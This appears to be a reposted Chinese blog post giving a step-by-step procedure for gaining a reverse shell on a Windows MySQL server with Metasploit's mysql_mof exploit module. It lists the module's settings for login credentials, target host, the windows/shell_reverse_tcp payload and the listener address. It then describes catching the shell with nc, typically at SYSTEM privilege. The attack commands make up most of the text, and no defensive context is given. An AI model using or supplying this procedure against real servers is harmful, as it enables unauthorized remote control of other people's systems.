mysql 反弹shell_mysql mof+metasploit反弹shell

metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网use exploit/windows/mysql/mysql_mof

set password xxx    //设置登录mysql的密码

set username xxx    //设置登录mysql的用户

set rhost xxx       //设置要登录的ip地址

set rport xxxx      //设置mysql的端口号

set payload windows/shell_reverse_tcp    //所使用的反弹模块

set lhost xxx       //反弹到的ip地址

set lport xxx       //反弹到的端口

show options        //设置完成后,使用该命令可查看设置参数情况

exploit             //执行

e5d5e71e69a60a2511929f8a2579a004.png

如没问题,即exploit执行

这边我们使用nc监听对应端口号,就可以接收到shell了,通常情况为system权限,因为mof文件是由system执行

4648a5b7efd16a07622a5dbc5c68c0e9.png

错误之处,敬请指正

原文:http://z2ppp.blog.51cto.com/11186185/1975993

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值